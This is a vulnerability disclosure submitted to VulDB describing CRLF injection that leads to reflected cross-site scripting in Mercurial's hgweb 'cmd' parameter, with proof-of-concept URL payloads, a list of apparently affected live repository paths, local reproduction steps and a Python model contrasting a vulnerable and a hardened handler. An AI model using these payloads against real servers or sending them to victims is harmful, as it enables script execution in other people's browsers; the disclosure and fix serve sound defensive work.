Submission #514024: Mercurial Mercurial SCM Web Interface 4.5.3 CRLF Injection leads to Cross-Site Scripting

Information

Title: Mercurial Mercurial SCM Web Interface 4.5.3 CRLF Injection leads to Cross-Site Scripting
Description: CRLF Injection Leading to Reflected XSS in Mercurial SCM Repository

Summary

A CRLF injection vulnerability has been identified in the Mercurial SCM web interface (hgweb). User-controlled input passed via the ?cmd= parameter is reflected into the HTTP response without carriage-return/line-feed characters being sanitised, so an attacker can inject arbitrary HTTP headers and, by terminating the header section early, arbitrary response body content. The result is a reflected Cross-Site Scripting (XSS) attack.

Product affected: Mercurial SCM Web Interface (mercurial-scm.org)
Vendor: Mercurial Distributed SCM (version 4.5.3)

Technical details

Vulnerability type:
- CRLF Injection (CWE-93)
- Reflected Cross-Site Scripting (CWE-79)

Proof-of-concept URL:

https://host[.]com/[repository]/?cmd=%0d%0aContent-Type:text/html%0d%0a%0d%0a%3Cimg%20src=x%20onerror=alert(1)%3E

Real-world examples:

https://example.com/src/?cmd=%0d%0aContent-Type:text/html%0d%0a%0d%0a%3Cimg%20src=x%20onerror=alert(1)%3E
https://example.com/gemma/?cmd=%0d%0aContent-Type:text/html%0d%0a%0d%0a%3Cimg%20src=x%20onerror=alert(1)%3E
https://example.com/libedl/?cmd=%0d%0aContent-Type:text/html%0d%0a%0d%0a%3Cimg%20src=x%20onerror=alert(1)%3E
https://x.x.x.x/diff-colorize/?cmd=%0d%0aContent-Type:text/html%0d%0a%0d%0a%3Cimg%20src=x%20onerror=alert(1)%3E

Local reproduction

A local installation of Mercurial was performed using the following command:

apt install mercurial -y

Next, a repository was cloned for testing:

hg clone https://hg.weblate.org/gemma/

After cloning, the built-in server was started pointing to the cloned repository:

hg serve --repository gemma/

To test the vulnerability, the following URL was accessed:

http://localhost:8000/rev/?cmd=%0d%0ax%0d%0aContent-Type:text/html%0d%0a%0d%0a%3Cimg%20src=x%20onerror=alert(1)%3E

In the local environment it was necessary to prefix the payload with %0d%0ax%0d%0a for the exploit to work, whereas on the remote servers a leading %0d%0a was enough to achieve the same result.

Explanation

The cmd parameter is not sanitised, so an attacker can inject %0d%0a (CRLF) sequences. The first CRLF terminates the header line into which the value is reflected and lets the attacker append a Content-Type: text/html header; the following empty line (%0d%0a%0d%0a) terminates the header section, so everything after it is delivered as the response body, which the browser now renders as HTML. An attacker can then inject arbitrary JavaScript payloads, such as <img src=x onerror=alert(1)>, leading to XSS. Because this is a reflected XSS, the payload must be delivered as a link to a victim, whose browser then executes it.
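The chain described above, as an added example written for this page (it is not code from the submission and not Mercurial's own code). The sink is hypothetical: the model reflects an unknown cmd value verbatim into the reason phrase of an error response, which is enough to reproduce the behaviour the report describes without claiming which line of hgweb is responsible. Python is used because Mercurial itself is written in Python. The block builds the probe URL for a repository path, serialises a response the way a naive server would, shows how a browser-style parser then sees the attacker's Content-Type and body, and contrasts that with a handler that refuses CR/LF before the value can reach the header section.

```python
"""Added example (not part of the VulDB submission, not Mercurial's code):
a self-contained model of the CRLF-to-reflected-XSS chain in the report.

Hypothetical sink: an unknown ``cmd`` value is echoed into the reason phrase
of an HTTP error response.  The report only says the parameter reaches the
response headers; the exact hgweb code path is not stated and not modelled.
"""
import re
from urllib.parse import parse_qs, quote, urlsplit

# The report's payload, decoded.  The first CRLF ends the header line the
# value lands in, the CRLF CRLF pair ends the header section, and the rest
# becomes the response body.
PAYLOAD = "\r\nContent-Type:text/html\r\n\r\n<img src=x onerror=alert(1)>"
# Variant the report needed against the local `hg serve`: an extra dummy line.
PAYLOAD_LOCAL = "\r\nx" + PAYLOAD
MARKER = "<img src=x onerror=alert(1)>"
CRLF_RE = re.compile(r"[\r\n]")


def probe_url(repo_base, payload=PAYLOAD):
    """Build the probe URL for one repository path, e.g. https://host/src."""
    return f"{repo_base.rstrip('/')}/?cmd={quote(payload, safe='')}"


def serialize(status, headers, body):
    """Write a response the way a naive HTTP/WSGI server does: no CR/LF checks."""
    head = [f"HTTP/1.1 {status}"] + [f"{k}: {v}" for k, v in headers]
    return "\r\n".join(head) + "\r\n\r\n" + body


def vulnerable_handler(cmd):
    """Hypothetical vulnerable sink: cmd is reflected into the reason phrase."""
    return serialize(f"400 no such method: {cmd}",
                     [("Content-Type", "text/plain; charset=ascii")],
                     "no such method")


def hardened_handler(cmd):
    """Fix: reject any CR or LF before the value can reach the header section,
    and reflect the value only in a text/plain body."""
    if CRLF_RE.search(cmd):
        return serialize("400 Bad Request",
                         [("Content-Type", "text/plain; charset=ascii")],
                         "invalid cmd")
    return serialize("400 Bad Request",
                     [("Content-Type", "text/plain; charset=ascii")],
                     f"no such method: {cmd}")


def parse_response(raw):
    """Split a raw response as a browser would: the first blank line ends the
    headers, everything after it is the body."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def header_injected(raw, marker=MARKER):
    """True when the attacker's Content-Type won and the marker is in the body,
    i.e. the response would be rendered as HTML containing the payload."""
    _, headers, body = parse_response(raw)
    ctype = headers.get("content-type", "")
    return ctype.lower().startswith("text/html") and marker in body


def cmd_from_url(url):
    """Decode the cmd parameter the way the server's query parser would."""
    return parse_qs(urlsplit(url).query)["cmd"][0]


if __name__ == "__main__":
    url = probe_url("https://example.com/src")
    cmd = cmd_from_url(url)
    print(url)
    for name, handler in (("vulnerable", vulnerable_handler),
                          ("hardened", hardened_handler)):
        print(f"{name}: injected={header_injected(handler(cmd))}")
```

In the vulnerable case the server's own Content-Type: text/plain header ends up after the attacker's blank line, so the browser sees it as body text, not as a header; that is the detail to look for when triaging a real response, rather than only grepping for the marker.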
Source: https://mercurial-scm.org/
User: erickfernandox (UID 57733)
Submitted: 04/03/2025 01:55 PM (1 year ago)
Moderation: 16/03/2025 10:18 AM (12 days later)
Status: Approved
VulDB Entry: 299860 [Mercurial SCM 4.5.3/71.19.145.211 Web Interface cmd cross site scripting]
Points: 17
